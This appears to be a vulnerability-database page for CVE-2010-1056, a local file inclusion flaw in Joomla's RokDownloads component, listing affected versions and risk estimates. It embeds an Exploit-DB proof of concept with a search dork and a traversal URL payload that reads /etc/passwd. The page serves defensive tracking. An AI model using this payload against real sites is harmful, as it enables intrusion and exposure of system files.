CVE-2010-1056

medium
Published 2010-03-23 ยท Modified 2026-04-29
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
7.8

Description

Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-11760 webapps php verified text ยท 1 KB
AtT4CKxT3rR0r1ST ยท 2010-03-15

Joomla! Component com_rokdownloads - Local File Inclusion

text exploit Source: Exploit-DB
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Joomla Component com_rokdownloads
.:. Bug Type : Local File Inclusion [LFI]
.:. Dork : inurl:"com_rokdownloads"

####################################################################

===[ Exploit ]===

www.site.com/index.php?option=com_rokdownloads&controller=[LFI]
www.site.com/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00

####################################################################

Application impact

VendorProductVersionsFixed
rocketthemecom_rokdownloads{"endIncluding":"1.0"}
rocketthemecom_rokdownloads0.91
rocketthemecom_rokdownloads0.92
rocketthemecom_rokdownloads0.93
rocketthemecom_rokdownloads0.94
rocketthemecom_rokdownloads0.95
rocketthemecom_rokdownloads0.96
rocketthemecom_rokdownloads0.97
rocketthemecom_rokdownloads0.98
rocketthemecom_rokdownloads1.0
joomla joomlajoomla\!

References

CWEs

CWE-22

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.